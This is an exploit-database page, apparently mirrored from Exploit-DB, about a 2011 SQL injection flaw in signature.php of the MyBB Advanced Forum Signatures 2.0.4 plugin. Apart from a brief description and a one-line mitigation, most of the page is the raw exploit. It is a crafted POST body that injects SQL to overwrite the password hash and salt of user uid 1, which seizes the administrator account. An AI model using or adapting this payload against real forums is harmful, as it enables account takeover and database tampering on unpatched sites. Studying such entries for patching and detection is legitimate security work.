header-logo
Suggest Exploit
vendor:
Advanced Forum Signatures
by:
Mario_Vs
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Advanced Forum Signatures
Affected Version From: 2.0.4
Affected Version To: 2.0.4
Patch Exists: NO
Related CWE: N/A
CPE: a:mybb:advanced_forum_signatures:2.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2011

MyBB Advanced Forum Signatures (afsignatures-2.0.4)

A SQL injection vulnerability exists in the signature.php file of MyBB Advanced Forum Signatures (afsignatures-2.0.4). An attacker can exploit this vulnerability by sending a specially crafted POST request with malicious SQL code to the signature.php file. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

---------------------------------------------------------------------
Exploit Title : MyBB Advanced Forum Signatures (afsignatures-2.0.4)
---------------------------------------------------------------------

Author      : Mario_Vs
Date        : 10/10/2011
Site        : http://mariovs.pl/
@  	    : mario_vs[at]o2.pl
---------------------------------------------------------------------

Description >

Vendor 	    : http://mods.mybb.com/download/advanced-forum-signatures
Tested On   : Windows 7
---------------------------------------------------------------------

SQL Injection

>> signature.php

POST -> afs_html=<a+href="http://localhost/mybb"><img+src="http://localhost/mybb/signature.php?uid=1"+alt=""+/></a>&afs_bbcode=[url=http://localhost/mybb][img]http://localhost/mybb/signature.php?uid=1[/img][/url]&afs_type=bar&afs_background=Default_Blue&afs_showonline=1&afs_full_line1=username&afs_full_line2=usergroup&afs_full_line3=postcount&afs_full_line4=registrationdate&afs_full_line5=reputation&afs_full_line6=blank&afs_bar_left=username&afs_bar_center=usergroup&afs_bar_right=postcount' , `password`= '65a1447de8e73ae67a938ae997ad4ed4', `salt`= 'NPOvUCXg'  WHERE `uid`='1';-- 
---------------------------------------------------------------------

---------------------------------------------------------------------

Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2

All users: HackinQ.pl

Navigation

Suggest Exploit

Services By CQR